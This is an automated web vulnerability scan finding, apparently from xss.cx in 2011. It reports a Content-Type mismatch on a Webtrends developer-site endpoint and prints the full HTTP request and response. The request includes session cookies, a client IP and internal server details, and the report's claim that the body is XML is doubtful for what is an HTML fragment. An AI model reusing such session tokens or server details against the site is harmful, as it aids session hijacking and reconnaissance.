The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /view-favorite-activity.jspa?object=1466&contentObjectType=1&view=everyone&page=1&_=1300116917523 HTTP/1.1
Host: developer.webtrends.com
Connection: keep-alive
Referer: https://developer.webtrends.com/message/2426
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
X-J-Token: no-user
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Local=Language=us; jive.server.info="serverName=developer.webtrends.com:serverPort=443:contextPath=:localName=webtrends-developer-vm-wa02.sgvmhosted.jiveland.com:localPort=9200:localAddr=127.0.0.1"; JSESSIONID=0441C06DA6D4E3C6335F031B75F08710.; BIGipServerPool_VM133.33=1379563530.20480.0000; WT_FPC=id=173.193.214.243-1194945472.30133593:lv=NaN:ss=1300105892512; WT_FPC_A=id=173.193.214.243-1194945472.30133593:lv=1300106003105:ss=1300105893745; jive.recentHistory.-1=332c323035303b332c333730353b332c323334353b312c313436363b31342c323031303b

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 15:35:23 GMT
Server: Apache-Coyote/1.1
X-JAL: 7
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
X-JSL: D=14202 t=1300116924469730
Cache-Control: no-cache, private, no-store, must-revalidate, max-age=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 118

<ul class="page-1 clearfix">
<li>
<span>No public bookmarks exist for this content.</span>
</li>
</ul>

Report generated by xss.cx at Mon Mar 14 10:38:23 CDT 2011.